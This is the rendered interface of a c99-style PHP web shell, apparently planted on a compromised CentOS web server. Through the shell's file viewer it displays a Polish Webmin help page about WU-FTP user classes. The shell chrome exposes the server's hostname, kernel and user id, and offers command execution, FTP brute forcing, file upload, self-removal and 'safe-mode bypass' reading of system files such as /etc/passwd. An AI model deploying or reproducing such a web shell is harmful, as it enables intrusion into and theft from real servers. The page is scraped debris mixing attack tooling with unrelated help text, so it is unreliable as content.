!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/wuftpd/help/   drwxr-xr-x
Free 50.87 GB of 127.8 GB (39.81%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     class.pl.html (1.5 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Użytkownicy i klasy
Serwer WU FTP pozwala na klasyfikację użytkowników w oparciu o adres IP, z którego się logują i typ użytkownika. Istnieją trzy typy użytkowników:
  • Uniksa - Normalni użytkownicy systemu Unix.
  • Goście - Użytkownicy Uniksa sklasyfikowani jako goście.
  • Anonimowi - Wlogowani jako użytkownik anonymous lub ftp, jeżeli system na to pozwala.

Pierwsza sekcja strony umożliwia zdefiniowanie nazwanych klas w oparciu o typ użytkownika i jego adres IP. Każdy login będzie klasyfikowany do pierwszej pasującej klasy, zatem klasy powinny być definiowane poczynając od najbardziej specyficznych. Adresy mogą być podane w postaci pełnego lub częściowego adresu IP, kombibacji podsieć IP/maska, nazw komputerów (z rozwijanymi znakami * i ?, jak na przykład*.foo.com), oraz absolutnych ścieżek do plików zawierających adresy. W celu zanegowania każdy adres może być poprzedzony wykrzyknikiem !.

Następna sekcja umożliwia określenie, którzy użytkownicy Uniksa mają być klasyfikowani jako goście. Gość ma prawa podobne jak zwykły użytkownik Uniksa, ale poprzez zastosowanie chroot jest ograniczony do określonej kartoteki.

Ostatnia sekcja umożliwia określenie, którzy użytkownicy Unixa i goście nie mogą korzystać z serwera FTP. Można wyspecyfikować użytkowników poprzez nazwę, GID (jak %3000) lub zakres GID (jak %3000-3010).



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0102 ]--